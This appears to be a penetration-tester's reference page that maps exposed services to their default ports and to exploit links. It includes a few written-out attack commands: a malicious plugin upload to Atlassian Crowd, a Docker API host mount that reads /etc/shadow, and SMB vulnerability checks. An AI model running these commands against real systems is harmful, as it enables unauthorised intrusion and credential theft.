# Low-Hanging Fruit

## Services

### Adobe ColdFusion BlazeDS

**Ports:** 8080\
**Exploit:**

{% embed url="https://www.tenable.com/plugins/nessus/99731" %}

{% embed url="https://www.exploit-db.com/exploits/43993" %}

### Apache Flink

**Ports:** 5000\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/http/apache_flink_jar_upload_exec" %}

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal" %}

{% embed url="https://www.exploit-db.com/exploits/48978" %}

### Apache Hadoop

**Ports:** 8088\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/http/hadoop_unauth_exec" %}

{% embed url="https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py" %}

### Apache Solr

**Ports:** 8983\
**Exploit:**

{% embed url="https://github.com/jas502n/solr_rce" %}

{% embed url="https://github.com/Imanfeng/Apache-Solr-RCE" %}

### Apache Spark

**Ports:** 6066\
**Exploit:**

{% embed url="https://github.com/ivanitlearning/CVE-2018-11770" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/http/spark_unauth_rce" %}

### Atlassian Crowd

**Ports:** 4990\
**Exploit:**

```bash
curl -k -H "Content-Type: multipart/mixed" \
  --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action
```

{% embed url="https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html" %}

### Cisco Smart Install

**Ports:** 4786\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/misc/cisco_smart_install" %}

{% embed url="https://github.com/frostbits-security/SIET" %}

### Cisco Unified Communications Manager

**Ports:** 6970\
**Exploit:**

```bash
curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt
```

{% embed url="https://github.com/trustedsec/SeeYouCM-Thief" %}

### Dameware

**Ports:** 6129\
**Exploit:**

{% embed url="https://www.tenable.com/security/research/tra-2019-43" %}

{% embed url="https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py" %}

### Dell iDRAC

**Ports:** 443\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/dell_idrac" %}

### Docker API

**Ports:** 2375\
**Exploit:**

```bash
docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
```

* File Access: `cat /mnt/etc/shadow`
* Remote Code Execution: `chroot /mnt`

### GlassFish

**Ports:** 4848\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/glassfish_traversal" %}

### Hashicorp Consul

**Ports:** 8500\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/consul_service_exec" %}

### HP Data Protector

**Ports:** 5555, 5556\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/hp_data_protector_exec_integutil" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/misc/hp_dataprotector_cmd_exec" %}

### HP iLO

**Ports:** 80, 443\
**Exploit:**

{% embed url="https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py" %}

### IBM Websphere

**Ports:** 8880\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/misc/ibm_websphere_java_deserialize" %}

### IPMI

**Ports:** 623\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version" %}

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes" %}

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero" %}

### Java RMI

**Ports:** 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server" %}

{% embed url="https://itnext.io/java-rmi-for-pentesters-structure-recon-and-communication-non-jmx-registries-a10d5c996a79" %}

{% embed url="https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314d" %}

### JBoss

**Ports:** 4444, 4445, 11111\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/jboss_vulnscan" %}

{% embed url="https://github.com/joaomatosf/jexboss" %}

### JDWP

**Ports:** 5005 - 5009, 45000, 45001\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/java_jdwp_debugger" %}

{% embed url="https://github.com/IOActive/jdwp-shellifier" %}

### JMX

**Ports:** 8686, 9012, 50500\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server" %}

### MS17-010: Eternal Blue

**Ports:** 139, 445\
**Exploit:**

```bash
nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip
```

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/" %}

### Portainer

**Ports:** 9000\
**Exploit:**

{% embed url="https://github.com/MauroEldritch/PAZUZU" %}

{% embed url="https://github.com/MauroEldritch/lempo" %}

### PrintNightmare

**Ports:** 445\
**Exploit:**

```bash
crackmapexec smb $host_file -u $username -p $password -M spooler
```

{% embed url="https://github.com/cube0x0/CVE-2021-1675" %}

### Redis

**Ports:** 6379\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/redis/redis_replication_cmd_exec" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/redis/redis_unauth_exec" %}

### SAP

**Ports:** 3300\
**Exploit:**

{% embed url="https://github.com/chipik/SAP_GW_RCE_exploit" %}

### WebLogic

**Ports:** 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503\
**Exploit:**

{% embed url="https://www.exploit-db.com/search?q=weblogic" %}

### Zoho ManageEngine Desktop Central

**Ports:** 8383\
**Exploit:**

{% embed url="https://srcincite.io/pocs/src-2020-0011.py.txt" %}

### References

{% embed url="https://github.com/trustedsec/spoonmap" %}

{% embed url="https://twitter.com/ptswarm/status/1354417582070247426" %}
